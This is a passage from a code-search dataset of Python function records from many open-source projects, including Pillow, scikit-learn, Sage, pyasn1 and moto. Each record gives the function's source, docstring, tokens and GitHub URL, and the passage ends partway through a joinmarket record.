        add_data(self.db, "CustomAction",
                 [(machine_action, 51+256, target_dir_prop, "[" + machine_prop + "]"),
                  (user_action, 51+256, target_dir_prop, "[" + user_prop + "]"),
                  (exe_action, 51+256, exe_prop, "[" + target_dir_prop + "]\\python.exe"),
                 ])
        add_data(self.db, "InstallExecuteSequence",
                 [(machine_action, machine_prop, start),
                  (user_action, user_prop, start + 1),
                  (exe_action, None, start + 2),
                 ])
        add_data(self.db, "InstallUISequence",
                 [(machine_action, machine_prop, start),
                  (user_action, user_prop, start + 1),
                  (exe_action, None, start + 2),
                 ])
        add_data(self.db, "Condition",
                 [("Python" + ver, 0, "NOT TARGETDIR" + ver)])
        start += 4
        assert start < 500
[ "def", "add_find_python", "(", "self", ")", ":", "start", "=", "402", "for", "ver", "in", "self", ".", "versions", ":", "install_path", "=", "r\"SOFTWARE\\Python\\PythonCore\\%s\\InstallPath\"", "%", "ver", "machine_reg", "=", "\"python.machine.\"", "+", "ver", "u...
https://github.com/jython/jython3/blob/def4f8ec47cb7a9c799ea4c745f12badf92c5769/lib-python/3.5.1/distutils/command/bdist_msi.py#L323-L375
python-pillow/Pillow
fd2b07c454b20e1e9af0cea64923b21250f8f8d6
src/PIL/ImageDraw.py
python
ImageDraw.__init__
(self, im, mode=None)
Create a drawing instance. :param im: The image to draw in. :param mode: Optional mode to use for color values. For RGB images, this argument can be RGB or RGBA (to blend the drawing into the image). For all other modes, this argument must be the same as the image mode. If omitted, the mode defaults to the mode of the image.
Create a drawing instance.
[ "Create", "a", "drawing", "instance", "." ]
def __init__(self, im, mode=None):
    """
    Create a drawing instance.

    :param im: The image to draw in.
    :param mode: Optional mode to use for color values.  For RGB
       images, this argument can be RGB or RGBA (to blend the
       drawing into the image).  For all other modes, this argument
       must be the same as the image mode.  If omitted, the mode
       defaults to the mode of the image.
    """
    im.load()
    if im.readonly:
        im._copy()  # make it writeable
    blend = 0
    if mode is None:
        mode = im.mode
    if mode != im.mode:
        if mode == "RGBA" and im.mode == "RGB":
            blend = 1
        else:
            raise ValueError("mode mismatch")
    if mode == "P":
        self.palette = im.palette
    else:
        self.palette = None
    self._image = im
    self.im = im.im
    self.draw = Image.core.draw(self.im, blend)
    self.mode = mode
    if mode in ("I", "F"):
        self.ink = self.draw.draw_ink(1)
    else:
        self.ink = self.draw.draw_ink(-1)
    if mode in ("1", "P", "I", "F"):
        # FIXME: fix Fill2 to properly support matte for I+F images
        self.fontmode = "1"
    else:
        self.fontmode = "L"  # aliasing is okay for other modes
    self.fill = 0
    self.font = None
[ "def", "__init__", "(", "self", ",", "im", ",", "mode", "=", "None", ")", ":", "im", ".", "load", "(", ")", "if", "im", ".", "readonly", ":", "im", ".", "_copy", "(", ")", "# make it writeable", "blend", "=", "0", "if", "mode", "is", "None", ":",...
https://github.com/python-pillow/Pillow/blob/fd2b07c454b20e1e9af0cea64923b21250f8f8d6/src/PIL/ImageDraw.py#L47-L87
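A minimal Pillow usage sketch for the record above: passing "RGBA" as the mode on an "RGB" image takes the blend=1 path described in the docstring, so fills that carry an alpha component are composited into the image instead of overwriting it. The output filename is illustrative.

from PIL import Image, ImageDraw

im = Image.new("RGB", (100, 100), "white")
draw = ImageDraw.Draw(im, "RGBA")   # RGBA mode on an RGB image -> blend=1
# half-transparent red rectangle, blended into the white background
draw.rectangle([10, 10, 90, 90], fill=(255, 0, 0, 128))
im.save("blended.png")              # illustrative output path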
sagemath/sage
f9b2db94f675ff16963ccdefba4f1a3393b3fe0d
src/sage/functions/hypergeometric.py
python
Hypergeometric._evalf_
(self, a, b, z, parent, algorithm=None)
return mpmath_utils.call(hyper, aa, bb, z, parent=parent)
TESTS:: sage: hypergeometric([1, 1], [2], -1).n() 0.693147180559945 sage: hypergeometric([], [], RealField(100)(1)) 2.7182818284590452353602874714
TESTS::
[ "TESTS", "::" ]
def _evalf_(self, a, b, z, parent, algorithm=None): """ TESTS:: sage: hypergeometric([1, 1], [2], -1).n() 0.693147180559945 sage: hypergeometric([], [], RealField(100)(1)) 2.7182818284590452353602874714 """ if not isinstance(a, tuple) or not isinstance(b, tuple): raise TypeError("The first two parameters must be of type list") from mpmath import hyper aa = [rational_param_as_tuple(c) for c in a] bb = [rational_param_as_tuple(c) for c in b] return mpmath_utils.call(hyper, aa, bb, z, parent=parent)
[ "def", "_evalf_", "(", "self", ",", "a", ",", "b", ",", "z", ",", "parent", ",", "algorithm", "=", "None", ")", ":", "if", "not", "isinstance", "(", "a", ",", "tuple", ")", "or", "not", "isinstance", "(", "b", ",", "tuple", ")", ":", "raise", "...
https://github.com/sagemath/sage/blob/f9b2db94f675ff16963ccdefba4f1a3393b3fe0d/src/sage/functions/hypergeometric.py#L349-L364
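The Sage wrapper above converts rational parameters and defers to mpmath's hyper; a standalone mpmath sketch reproducing the docstring's test values (2F1(1,1;2;-1) = log 2, and 0F0(1) = e):

from mpmath import mp, hyper

mp.dps = 15
print(hyper([1, 1], [2], -1))   # 0.693147180559945, i.e. log(2)
print(hyper([], [], 1))         # 2.71828182845905, i.e. e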
MontrealCorpusTools/Montreal-Forced-Aligner
63473f9a4fabd31eec14e1e5022882f85cfdaf31
montreal_forced_aligner/dictionary/pronunciation.py
python
PronunciationDictionaryMixin._write_fst_text_disambiguated
( self, multispeaker_dictionary: Optional[MultispeakerDictionaryMixin] = None )
Write the text L_disambig.fst file to the temporary directory Parameters ---------- multispeaker_dictionary: MultispeakerDictionaryMixin, optional Main dictionary with phone mappings
Write the text L_disambig.fst file to the temporary directory
[ "Write", "the", "text", "L_disambig", ".", "fst", "file", "to", "the", "temporary", "directory" ]
def _write_fst_text_disambiguated( self, multispeaker_dictionary: Optional[MultispeakerDictionaryMixin] = None ) -> None: """ Write the text L_disambig.fst file to the temporary directory Parameters ---------- multispeaker_dictionary: MultispeakerDictionaryMixin, optional Main dictionary with phone mappings """ lexicon_fst_path = os.path.join( self.dictionary_output_directory, "lexicon_disambig.text.fst" ) if multispeaker_dictionary is not None: sil_disambiguation = f"#{multispeaker_dictionary.max_disambiguation_symbol + 1}" else: sil_disambiguation = f"#{self.max_disambiguation_symbol + 1}" assert self.silence_probability start_state = 0 loop_state = 1 silence_state = 2 next_state = 3 silence_phone = self.optional_silence_phone silence_cost = -1 * math.log(self.silence_probability) no_silence_cost = -1 * math.log(1 - self.silence_probability) with open(lexicon_fst_path, "w", encoding="utf8") as outf: outf.write( f"{start_state}\t{loop_state}\t<eps>\t<eps>\t{no_silence_cost}\n" ) # no silence outf.write( f"{start_state}\t{silence_state}\t<eps>\t<eps>\t{silence_cost}\n" ) # silence silence_disambiguation_state = next_state next_state += 1 outf.write( f"{silence_state}\t{silence_disambiguation_state}\t{silence_phone}\t<eps>\t0.0\n" ) # silence disambig outf.write( f"{silence_disambiguation_state}\t{loop_state}\t{sil_disambiguation}\t<eps>\t0.0\n" ) # silence disambig for w in sorted(self.words.keys()): if self.exclude_for_alignment(w): continue for pron in sorted(self.words[w].pronunciations): phones = list(pron.pronunciation) prob = pron.probability disambig_symbol = pron.disambiguation if self.position_dependent_phones: if len(phones) == 1: phones[0] += "_S" else: for i in range(len(phones)): if i == 0: phones[i] += "_B" elif i == len(phones) - 1: phones[i] += "_E" else: phones[i] += "_I" if not prob: prob = 0.001 # Dithering to ensure low probability entries pron_cost = abs(math.log(prob)) if disambig_symbol: phones += [f"#{disambig_symbol}"] current_state = loop_state for i in range(0, len(phones) - 1): p = phones[i] outf.write( f"{current_state}\t{next_state}\t{p}\t{w if i == 0 else '<eps>'}\t{pron_cost if i == 0 else 0.0}\n" ) current_state = next_state next_state += 1 i = len(phones) - 1 local_no_silence_cost = no_silence_cost + pron_cost local_silcost = silence_cost + pron_cost if i <= 0: local_silcost = silence_cost local_no_silence_cost = no_silence_cost outf.write( f"{current_state}\t{loop_state}\t{phones[i] if i >= 0 else '<eps>'}\t{w if i <= 0 else '<eps>'}\t{local_no_silence_cost}\n" ) outf.write( f"{current_state}\t{silence_state}\t{phones[i] if i >= 0 else '<eps>'}\t{w if i <= 0 else '<eps>'}\t{local_silcost}\n" ) outf.write(f"{loop_state}\t0.0\n")
[ "def", "_write_fst_text_disambiguated", "(", "self", ",", "multispeaker_dictionary", ":", "Optional", "[", "MultispeakerDictionaryMixin", "]", "=", "None", ")", "->", "None", ":", "lexicon_fst_path", "=", "os", ".", "path", ".", "join", "(", "self", ".", "dictio...
https://github.com/MontrealCorpusTools/Montreal-Forced-Aligner/blob/63473f9a4fabd31eec14e1e5022882f85cfdaf31/montreal_forced_aligner/dictionary/pronunciation.py#L779-L872
cobrateam/splinter
a3f30f53d886709e60218e46b521cbd87e9caadd
splinter/driver/__init__.py
python
DriverAPI.find_option_by_value
(self, value)
Find ``<option>`` elements by their value. Returns an instance of :class:`ElementList <splinter.element_list.ElementList>` Arguments: value (str): value to use in the search query.
Find ``<option>`` elements by their value.
[ "Find", "<option", ">", "elements", "by", "their", "value", "." ]
def find_option_by_value(self, value): """ Find ``<option>`` elements by their value. Returns an instance of :class:`ElementList <splinter.element_list.ElementList>` Arguments: value (str): value to use in the search query. """ raise NotImplementedError( "%s doesn't support finding options by value." % self.driver_name )
[ "def", "find_option_by_value", "(", "self", ",", "value", ")", ":", "raise", "NotImplementedError", "(", "\"%s doesn't support finding options by value.\"", "%", "self", ".", "driver_name", ")" ]
https://github.com/cobrateam/splinter/blob/a3f30f53d886709e60218e46b521cbd87e9caadd/splinter/driver/__init__.py#L278-L289
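A hedged usage sketch for the abstract method above through a concrete splinter driver (requires a working webdriver; the URL and option value are placeholders, and .first raises ElementDoesNotExist when nothing matched):

from splinter import Browser

with Browser() as browser:                          # default driver
    browser.visit("https://example.com/form")       # placeholder URL
    options = browser.find_option_by_value("gold")  # placeholder value
    options.first.click()                           # select the matched <option>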
PythonCharmers/python-future
80523f383fbba1c6de0551e19d0277e73e69573c
src/future/backports/urllib/request.py
python
parse_http_list
(s)
return [part.strip() for part in res]
Parse lists as described by RFC 2068 Section 2. In particular, parse comma-separated lists where the elements of the list may include quoted-strings. A quoted-string could contain a comma. A non-quoted string could have quotes in the middle. Neither commas nor quotes count if they are escaped. Only double-quotes count, not single-quotes.
Parse lists as described by RFC 2068 Section 2.
[ "Parse", "lists", "as", "described", "by", "RFC", "2068", "Section", "2", "." ]
def parse_http_list(s): """Parse lists as described by RFC 2068 Section 2. In particular, parse comma-separated lists where the elements of the list may include quoted-strings. A quoted-string could contain a comma. A non-quoted string could have quotes in the middle. Neither commas nor quotes count if they are escaped. Only double-quotes count, not single-quotes. """ res = [] part = '' escape = quote = False for cur in s: if escape: part += cur escape = False continue if quote: if cur == '\\': escape = True continue elif cur == '"': quote = False part += cur continue if cur == ',': res.append(part) part = '' continue if cur == '"': quote = True part += cur # append last part if part: res.append(part) return [part.strip() for part in res]
[ "def", "parse_http_list", "(", "s", ")", ":", "res", "=", "[", "]", "part", "=", "''", "escape", "=", "quote", "=", "False", "for", "cur", "in", "s", ":", "if", "escape", ":", "part", "+=", "cur", "escape", "=", "False", "continue", "if", "quote", ...
https://github.com/PythonCharmers/python-future/blob/80523f383fbba1c6de0551e19d0277e73e69573c/src/future/backports/urllib/request.py#L1371-L1412
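Two worked inputs for the parser above, run through the standard library's identical helper (urllib.request.parse_http_list) so the snippet is standalone: quoted strings may contain commas, and only quoting or escaping suppresses the split.

from urllib.request import parse_http_list

print(parse_http_list('text/html, image/png'))
# ['text/html', 'image/png']
print(parse_http_list('a="b,c", d'))
# ['a="b,c"', 'd']  -- the comma inside the quoted-string is preserved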
tendenci/tendenci
0f2c348cc0e7d41bc56f50b00ce05544b083bf1d
tendenci/apps/newsletters/forms.py
python
MarketingStep2EmailFilterForm.filter_email
(self, request, queryset)
return queryset
[]
def filter_email(self, request, queryset): search_criteria = request.GET.get('search_criteria') q = request.GET.get('q') query = {search_criteria: q} queryset = queryset.filter(**query) return queryset
[ "def", "filter_email", "(", "self", ",", "request", ",", "queryset", ")", ":", "search_criteria", "=", "request", ".", "GET", ".", "get", "(", "'search_criteria'", ")", "q", "=", "request", ".", "GET", ".", "get", "(", "'q'", ")", "query", "=", "{", ...
https://github.com/tendenci/tendenci/blob/0f2c348cc0e7d41bc56f50b00ce05544b083bf1d/tendenci/apps/newsletters/forms.py#L249-L255
pymeasure/pymeasure
b4d888e9ead85ef7f7af0031f2dbb44c9ce1825e
pymeasure/instruments/srs/sr570.py
python
SR570.blank_front
(self)
Blanks the frontend output of the device
Blanks the frontend output of the device
[ "Blanks", "the", "frontend", "output", "of", "the", "device" ]
def blank_front(self):
        """Blanks the frontend output of the device"""
        self.front_blanked = True
[ "def", "blank_front", "(", "self", ")", ":", "self", ".", "front_blanked", "=", "True" ]
https://github.com/pymeasure/pymeasure/blob/b4d888e9ead85ef7f7af0031f2dbb44c9ce1825e/pymeasure/instruments/srs/sr570.py#L202-L204
shekkizh/TensorflowProjects
5bd5563a5310df0b87725d989e84d49da0ea8c00
Misc/Deblurring.py
python
read_cifar10
(filename_queue)
return result
[]
def read_cifar10(filename_queue): class CIFAR10Record(object): pass result = CIFAR10Record() # Dimensions of the images in the CIFAR-10 dataset. # See http://www.cs.toronto.edu/~kriz/cifar.html for a description of the # input format. label_bytes = 1 # 2 for CIFAR-100 result.height = IMAGE_SIZE result.width = IMAGE_SIZE result.depth = 3 image_bytes = result.height * result.width * result.depth # Every record consists of a label followed by the image, with a # fixed number of bytes for each. record_bytes = label_bytes + image_bytes # Read a record, getting filenames from the filename_queue. No # header or footer in the CIFAR-10 format, so we leave header_bytes # and footer_bytes at their default of 0. reader = tf.FixedLengthRecordReader(record_bytes=record_bytes) result.key, value = reader.read(filename_queue) # Convert from a string to a vector of uint8 that is record_bytes long. record_bytes = tf.decode_raw(value, tf.uint8) # # The first bytes represent the label, which we convert from uint8->int32. # result.label = tf.cast( # tf.slice(record_bytes, [0], [label_bytes]), tf.int32) # The remaining bytes after the label represent the image, which we reshape # from [depth * height * width] to [depth, height, width]. depth_major = tf.reshape(tf.slice(record_bytes, [label_bytes], [image_bytes]), [result.depth, result.height, result.width]) # Convert from [depth, height, width] to [height, width, depth]. result.uint8image = tf.transpose(depth_major, [1, 2, 0]) image4d = tf.cast(tf.reshape(result.uint8image, [-1, result.height, result.width, result.depth]), dtype=tf.float32) W = tf.truncated_normal((5, 5, 3, 3), stddev=tf.random_uniform([1])) result.noise_image = tf.reshape(conv2d_basic(image4d, W), [result.height, result.width, result.depth]) return result
[ "def", "read_cifar10", "(", "filename_queue", ")", ":", "class", "CIFAR10Record", "(", "object", ")", ":", "pass", "result", "=", "CIFAR10Record", "(", ")", "# Dimensions of the images in the CIFAR-10 dataset.", "# See http://www.cs.toronto.edu/~kriz/cifar.html for a descriptio...
https://github.com/shekkizh/TensorflowProjects/blob/5bd5563a5310df0b87725d989e84d49da0ea8c00/Misc/Deblurring.py#L73-L114
MeanEYE/Sunflower
1024bbdde3b8e202ddad3553b321a7b6230bffc9
sunflower/plugin_base/item_list.py
python
ItemList._clear_list
(self)
Abstract method for clearing item list
Abstract method for clearing item list
[ "Abstract", "method", "for", "clearing", "item", "list" ]
def _clear_list(self): """Abstract method for clearing item list""" pass
[ "def", "_clear_list", "(", "self", ")", ":", "pass" ]
https://github.com/MeanEYE/Sunflower/blob/1024bbdde3b8e202ddad3553b321a7b6230bffc9/sunflower/plugin_base/item_list.py#L1046-L1048
kbandla/ImmunityDebugger
2abc03fb15c8f3ed0914e1175c4d8933977c73e3
1.84/Libs/x86smt/solver_cvc3.py
python
Solver.UConstFromExpr
(self, exp)
return tmp
return an unsigned long from a CONSTANT BITVECTOR expression
return an unsigned long from a CONSTANT BITVECTOR expression
[ "return", "an", "unsigned", "long", "from", "a", "CONSTANT", "BITVECTOR", "expression" ]
def UConstFromExpr(self, exp): """return an unsigned long from a CONSTANT BITVECTOR expression""" if self.getKind(exp) != self._BVCONST: return None tmp = int(self.exprString(exp)[4:], 2) return tmp
[ "def", "UConstFromExpr", "(", "self", ",", "exp", ")", ":", "if", "self", ".", "getKind", "(", "exp", ")", "!=", "self", ".", "_BVCONST", ":", "return", "None", "tmp", "=", "int", "(", "self", ".", "exprString", "(", "exp", ")", "[", "4", ":", "]...
https://github.com/kbandla/ImmunityDebugger/blob/2abc03fb15c8f3ed0914e1175c4d8933977c73e3/1.84/Libs/x86smt/solver_cvc3.py#L680-L685
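The [4:] slice above assumes CVC3 renders bitvector constants with a fixed 4-character prefix (e.g. "0bin..."), after which the remainder is a plain base-2 literal; the parsing step in isolation:

s = "0bin00001010"     # assumed CVC3-style constant rendering
print(int(s[4:], 2))   # 10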
IJDykeman/wangTiles
7c1ee2095ebdf7f72bce07d94c6484915d5cae8b
experimental_code/tiles_3d/venv_mac_py3/lib/python2.7/site-packages/pip/_vendor/requests/utils.py
python
unquote_header_value
(value, is_filename=False)
return value
r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). This does not use the real unquoting but what browsers are actually using for quoting. :param value: the header value to unquote. :rtype: str
r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). This does not use the real unquoting but what browsers are actually using for quoting.
[ "r", "Unquotes", "a", "header", "value", ".", "(", "Reversal", "of", ":", "func", ":", "quote_header_value", ")", ".", "This", "does", "not", "use", "the", "real", "unquoting", "but", "what", "browsers", "are", "actually", "using", "for", "quoting", "." ]
def unquote_header_value(value, is_filename=False): r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). This does not use the real unquoting but what browsers are actually using for quoting. :param value: the header value to unquote. :rtype: str """ if value and value[0] == value[-1] == '"': # this is not the real unquoting, but fixing this so that the # RFC is met will result in bugs with internet explorer and # probably some other browsers as well. IE for example is # uploading files with "C:\foo\bar.txt" as filename value = value[1:-1] # if this is a filename and the starting characters look like # a UNC path, then just return the value without quotes. Using the # replace sequence below on a UNC path has the effect of turning # the leading double slash into a single slash and then # _fix_ie_filename() doesn't work correctly. See #458. if not is_filename or value[:2] != '\\\\': return value.replace('\\\\', '\\').replace('\\"', '"') return value
[ "def", "unquote_header_value", "(", "value", ",", "is_filename", "=", "False", ")", ":", "if", "value", "and", "value", "[", "0", "]", "==", "value", "[", "-", "1", "]", "==", "'\"'", ":", "# this is not the real unquoting, but fixing this so that the", "# RFC i...
https://github.com/IJDykeman/wangTiles/blob/7c1ee2095ebdf7f72bce07d94c6484915d5cae8b/experimental_code/tiles_3d/venv_mac_py3/lib/python2.7/site-packages/pip/_vendor/requests/utils.py#L377-L399
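Worked examples for the helper above (assuming unquote_header_value from the record is in scope); note the UNC special case that skips backslash unescaping for filenames:

assert unquote_header_value('"hello world"') == 'hello world'
assert unquote_header_value(r'"a\"b"') == 'a"b'   # escapes are undone
assert unquote_header_value(r'"\\host\share\f.txt"',
                            is_filename=True) == r'\\host\share\f.txt'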
ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework
cb692f527e4e819b6c228187c5702d990a180043
bin/x86/Debug/scripting_engine/Lib/lib2to3/pytree.py
python
BasePattern.generate_matches
(self, nodes)
Generator yielding all matches for this pattern. Default implementation for non-wildcard patterns.
Generator yielding all matches for this pattern.
[ "Generator", "yielding", "all", "matches", "for", "this", "pattern", "." ]
def generate_matches(self, nodes): """ Generator yielding all matches for this pattern. Default implementation for non-wildcard patterns. """ r = {} if nodes and self.match(nodes[0], r): yield 1, r
[ "def", "generate_matches", "(", "self", ",", "nodes", ")", ":", "r", "=", "{", "}", "if", "nodes", "and", "self", ".", "match", "(", "nodes", "[", "0", "]", ",", "r", ")", ":", "yield", "1", ",", "r" ]
https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/blob/cb692f527e4e819b6c228187c5702d990a180043/bin/x86/Debug/scripting_engine/Lib/lib2to3/pytree.py#L523-L531
scikit-learn/scikit-learn
1d1aadd0711b87d2a11c80aad15df6f8cf156712
sklearn/cluster/_kmeans.py
python
_kmeans_single_elkan
( X, sample_weight, centers_init, max_iter=300, verbose=False, x_squared_norms=None, tol=1e-4, n_threads=1, )
return labels, inertia, centers, i + 1
A single run of k-means elkan, assumes preparation completed prior. Parameters ---------- X : {ndarray, sparse matrix} of shape (n_samples, n_features) The observations to cluster. If sparse matrix, must be in CSR format. sample_weight : array-like of shape (n_samples,) The weights for each observation in X. centers_init : ndarray of shape (n_clusters, n_features) The initial centers. max_iter : int, default=300 Maximum number of iterations of the k-means algorithm to run. verbose : bool, default=False Verbosity mode. x_squared_norms : array-like, default=None Precomputed x_squared_norms. tol : float, default=1e-4 Relative tolerance with regards to Frobenius norm of the difference in the cluster centers of two consecutive iterations to declare convergence. It's not advised to set `tol=0` since convergence might never be declared due to rounding errors. Use a very small number instead. n_threads : int, default=1 The number of OpenMP threads to use for the computation. Parallelism is sample-wise on the main cython loop which assigns each sample to its closest center. Returns ------- centroid : ndarray of shape (n_clusters, n_features) Centroids found at the last iteration of k-means. label : ndarray of shape (n_samples,) label[i] is the code or index of the centroid the i'th observation is closest to. inertia : float The final value of the inertia criterion (sum of squared distances to the closest centroid for all observations in the training set). n_iter : int Number of iterations run.
A single run of k-means elkan, assumes preparation completed prior.
[ "A", "single", "run", "of", "k", "-", "means", "elkan", "assumes", "preparation", "completed", "prior", "." ]
def _kmeans_single_elkan( X, sample_weight, centers_init, max_iter=300, verbose=False, x_squared_norms=None, tol=1e-4, n_threads=1, ): """A single run of k-means elkan, assumes preparation completed prior. Parameters ---------- X : {ndarray, sparse matrix} of shape (n_samples, n_features) The observations to cluster. If sparse matrix, must be in CSR format. sample_weight : array-like of shape (n_samples,) The weights for each observation in X. centers_init : ndarray of shape (n_clusters, n_features) The initial centers. max_iter : int, default=300 Maximum number of iterations of the k-means algorithm to run. verbose : bool, default=False Verbosity mode. x_squared_norms : array-like, default=None Precomputed x_squared_norms. tol : float, default=1e-4 Relative tolerance with regards to Frobenius norm of the difference in the cluster centers of two consecutive iterations to declare convergence. It's not advised to set `tol=0` since convergence might never be declared due to rounding errors. Use a very small number instead. n_threads : int, default=1 The number of OpenMP threads to use for the computation. Parallelism is sample-wise on the main cython loop which assigns each sample to its closest center. Returns ------- centroid : ndarray of shape (n_clusters, n_features) Centroids found at the last iteration of k-means. label : ndarray of shape (n_samples,) label[i] is the code or index of the centroid the i'th observation is closest to. inertia : float The final value of the inertia criterion (sum of squared distances to the closest centroid for all observations in the training set). n_iter : int Number of iterations run. """ n_samples = X.shape[0] n_clusters = centers_init.shape[0] # Buffers to avoid new allocations at each iteration. centers = centers_init centers_new = np.zeros_like(centers) weight_in_clusters = np.zeros(n_clusters, dtype=X.dtype) labels = np.full(n_samples, -1, dtype=np.int32) labels_old = labels.copy() center_half_distances = euclidean_distances(centers) / 2 distance_next_center = np.partition( np.asarray(center_half_distances), kth=1, axis=0 )[1] upper_bounds = np.zeros(n_samples, dtype=X.dtype) lower_bounds = np.zeros((n_samples, n_clusters), dtype=X.dtype) center_shift = np.zeros(n_clusters, dtype=X.dtype) if sp.issparse(X): init_bounds = init_bounds_sparse elkan_iter = elkan_iter_chunked_sparse _inertia = _inertia_sparse else: init_bounds = init_bounds_dense elkan_iter = elkan_iter_chunked_dense _inertia = _inertia_dense init_bounds(X, centers, center_half_distances, labels, upper_bounds, lower_bounds) strict_convergence = False for i in range(max_iter): elkan_iter( X, sample_weight, centers, centers_new, weight_in_clusters, center_half_distances, distance_next_center, upper_bounds, lower_bounds, labels, center_shift, n_threads, ) # compute new pairwise distances between centers and closest other # center of each center for next iterations center_half_distances = euclidean_distances(centers_new) / 2 distance_next_center = np.partition( np.asarray(center_half_distances), kth=1, axis=0 )[1] if verbose: inertia = _inertia(X, sample_weight, centers, labels, n_threads) print(f"Iteration {i}, inertia {inertia}") centers, centers_new = centers_new, centers if np.array_equal(labels, labels_old): # First check the labels for strict convergence. if verbose: print(f"Converged at iteration {i}: strict convergence.") strict_convergence = True break else: # No strict convergence, check for tol based convergence. 
            center_shift_tot = (center_shift ** 2).sum()
            if center_shift_tot <= tol:
                if verbose:
                    print(
                        f"Converged at iteration {i}: center shift "
                        f"{center_shift_tot} within tolerance {tol}."
                    )
                break

        labels_old[:] = labels

    if not strict_convergence:
        # rerun E-step so that predicted labels match cluster centers
        elkan_iter(
            X,
            sample_weight,
            centers,
            centers,
            weight_in_clusters,
            center_half_distances,
            distance_next_center,
            upper_bounds,
            lower_bounds,
            labels,
            center_shift,
            n_threads,
            update_centers=False,
        )

    inertia = _inertia(X, sample_weight, centers, labels, n_threads)

    return labels, inertia, centers, i + 1
[ "def", "_kmeans_single_elkan", "(", "X", ",", "sample_weight", ",", "centers_init", ",", "max_iter", "=", "300", ",", "verbose", "=", "False", ",", "x_squared_norms", "=", "None", ",", "tol", "=", "1e-4", ",", "n_threads", "=", "1", ",", ")", ":", "n_sam...
https://github.com/scikit-learn/scikit-learn/blob/1d1aadd0711b87d2a11c80aad15df6f8cf156712/sklearn/cluster/_kmeans.py#L390-L548
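The private single-run helper above is normally reached through the public estimator; a minimal sketch selecting the Elkan variant (data and parameter values are illustrative):

import numpy as np
from sklearn.cluster import KMeans

X = np.random.RandomState(0).rand(200, 2)
km = KMeans(n_clusters=3, algorithm="elkan", n_init=10, random_state=0).fit(X)
print(km.inertia_, km.n_iter_)   # the same quantities the helper returns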
PokemonGoF/PokemonGo-Bot-Desktop
4bfa94f0183406c6a86f93645eff7abd3ad4ced8
build/pywin/Lib/multiprocessing/util.py
python
Finalize.cancel
(self)
Cancel finalization of the object
Cancel finalization of the object
[ "Cancel", "finalization", "of", "the", "object" ]
def cancel(self): ''' Cancel finalization of the object ''' try: del _finalizer_registry[self._key] except KeyError: pass else: self._weakref = self._callback = self._args = \ self._kwargs = self._key = None
[ "def", "cancel", "(", "self", ")", ":", "try", ":", "del", "_finalizer_registry", "[", "self", ".", "_key", "]", "except", "KeyError", ":", "pass", "else", ":", "self", ".", "_weakref", "=", "self", ".", "_callback", "=", "self", ".", "_args", "=", "...
https://github.com/PokemonGoF/PokemonGo-Bot-Desktop/blob/4bfa94f0183406c6a86f93645eff7abd3ad4ced8/build/pywin/Lib/multiprocessing/util.py#L212-L222
spulec/moto
a688c0032596a7dfef122b69a08f2bec3be2e481
scripts/update_managed_policies.py
python
json_serial
(obj)
JSON serializer for objects not serializable by default json code
JSON serializer for objects not serializable by default json code
[ "JSON", "serializer", "for", "objects", "not", "serializable", "by", "default", "json", "code" ]
def json_serial(obj): """JSON serializer for objects not serializable by default json code""" if isinstance(obj, datetime): serial = obj.isoformat() return serial raise TypeError("Type not serializable")
[ "def", "json_serial", "(", "obj", ")", ":", "if", "isinstance", "(", "obj", ",", "datetime", ")", ":", "serial", "=", "obj", ".", "isoformat", "(", ")", "return", "serial", "raise", "TypeError", "(", "\"Type not serializable\"", ")" ]
https://github.com/spulec/moto/blob/a688c0032596a7dfef122b69a08f2bec3be2e481/scripts/update_managed_policies.py#L17-L23
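Typical use of the serializer above is as the default hook of json.dumps, which calls it only for objects the encoder cannot handle natively (assumes json_serial from the record is in scope):

import json
from datetime import datetime

payload = {"created": datetime(2020, 1, 1, 12, 0)}
print(json.dumps(payload, default=json_serial))
# {"created": "2020-01-01T12:00:00"}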
PaddlePaddle/PaddleX
2bab73f81ab54e328204e7871e6ae4a82e719f5d
static/paddlex/cv/nets/__init__.py
python
darknet53
(input, num_classes=1000)
return model(input)
[]
def darknet53(input, num_classes=1000): model = DarkNet(depth=53, num_classes=num_classes, bn_act='relu') return model(input)
[ "def", "darknet53", "(", "input", ",", "num_classes", "=", "1000", ")", ":", "model", "=", "DarkNet", "(", "depth", "=", "53", ",", "num_classes", "=", "num_classes", ",", "bn_act", "=", "'relu'", ")", "return", "model", "(", "input", ")" ]
https://github.com/PaddlePaddle/PaddleX/blob/2bab73f81ab54e328204e7871e6ae4a82e719f5d/static/paddlex/cv/nets/__init__.py#L79-L81
tp4a/teleport
1fafd34f1f775d2cf80ea4af6e44468d8e0b24ad
server/www/packages/packages-darwin/x64/pyasn1/type/namedtype.py
python
NamedTypes.getTypeByPosition
(self, idx)
Return ASN.1 type object by its position in fields set. Parameters ---------- idx: :py:class:`int` Field index Returns ------- : ASN.1 type Raises ------ : :class:`~pyasn1.error.PyAsn1Error` If given position is out of fields range
Return ASN.1 type object by its position in fields set.
[ "Return", "ASN", ".", "1", "type", "object", "by", "its", "position", "in", "fields", "set", "." ]
def getTypeByPosition(self, idx): """Return ASN.1 type object by its position in fields set. Parameters ---------- idx: :py:class:`int` Field index Returns ------- : ASN.1 type Raises ------ : :class:`~pyasn1.error.PyAsn1Error` If given position is out of fields range """ try: return self.__namedTypes[idx].asn1Object except IndexError: raise error.PyAsn1Error('Type position out of range')
[ "def", "getTypeByPosition", "(", "self", ",", "idx", ")", ":", "try", ":", "return", "self", ".", "__namedTypes", "[", "idx", "]", ".", "asn1Object", "except", "IndexError", ":", "raise", "error", ".", "PyAsn1Error", "(", "'Type position out of range'", ")" ]
https://github.com/tp4a/teleport/blob/1fafd34f1f775d2cf80ea4af6e44468d8e0b24ad/server/www/packages/packages-darwin/x64/pyasn1/type/namedtype.py#L281-L303
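A small sketch of positional lookup on a NamedTypes set (standard pyasn1 types; the field names are illustrative):

from pyasn1.type import namedtype, univ

fields = namedtype.NamedTypes(
    namedtype.NamedType('id', univ.Integer()),
    namedtype.NamedType('name', univ.OctetString()),
)
print(fields.getTypeByPosition(0))   # the Integer instance
# fields.getTypeByPosition(5) would raise pyasn1.error.PyAsn1Error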
JoinMarket-Org/joinmarket-clientserver
8b3d21f226185e31aa10e8e16cdfc719cea4a98e
jmclient/jmclient/wallet.py
python
FidelityBondMixin.add_burner_output
(self, path, txhex, block_height, merkle_branch, block_index, write=True)
merkle_branch = None means it was unavailable because of pruning
merkle_branch = None means it was unavailable because of pruning
[ "merkle_branch", "=", "None", "means", "it", "was", "unavailable", "because", "of", "pruning" ]
